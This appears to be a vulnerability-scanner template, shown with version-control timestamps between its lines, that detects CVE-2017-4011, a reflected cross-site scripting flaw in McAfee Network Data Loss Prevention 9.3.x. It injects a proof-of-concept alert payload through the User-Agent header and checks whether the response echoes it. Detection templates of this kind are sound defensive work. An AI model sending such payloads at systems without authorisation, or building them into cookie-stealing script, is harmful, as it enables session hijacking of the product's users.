2021-08-20 21:00:02 +00:00
id : CVE-2017-4011
2021-08-16 20:45:09 +00:00
info :
2022-08-16 14:14:41 +00:00
name : McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting
2021-08-17 11:31:34 +00:00
author : geeknik
severity : medium
2022-08-16 14:14:41 +00:00
description : McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.
2021-08-16 20:45:09 +00:00
reference :
- https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
2021-08-17 11:31:34 +00:00
- https://kc.mcafee.com/corporate/index?page=content&id=SB10198
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-4011
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-4011
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2017,mcafee,xss
2021-08-16 20:45:09 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}"
headers :
User-Agent : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//
matchers-condition : and
matchers :
- type : word
part : body
words :
- "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"
2021-08-17 11:31:34 +00:00
2021-08-16 20:45:09 +00:00
- type : word
part : header
words :
- "text/html"
2022-08-16 14:14:41 +00:00
# Enhanced by mp on 2022/08/12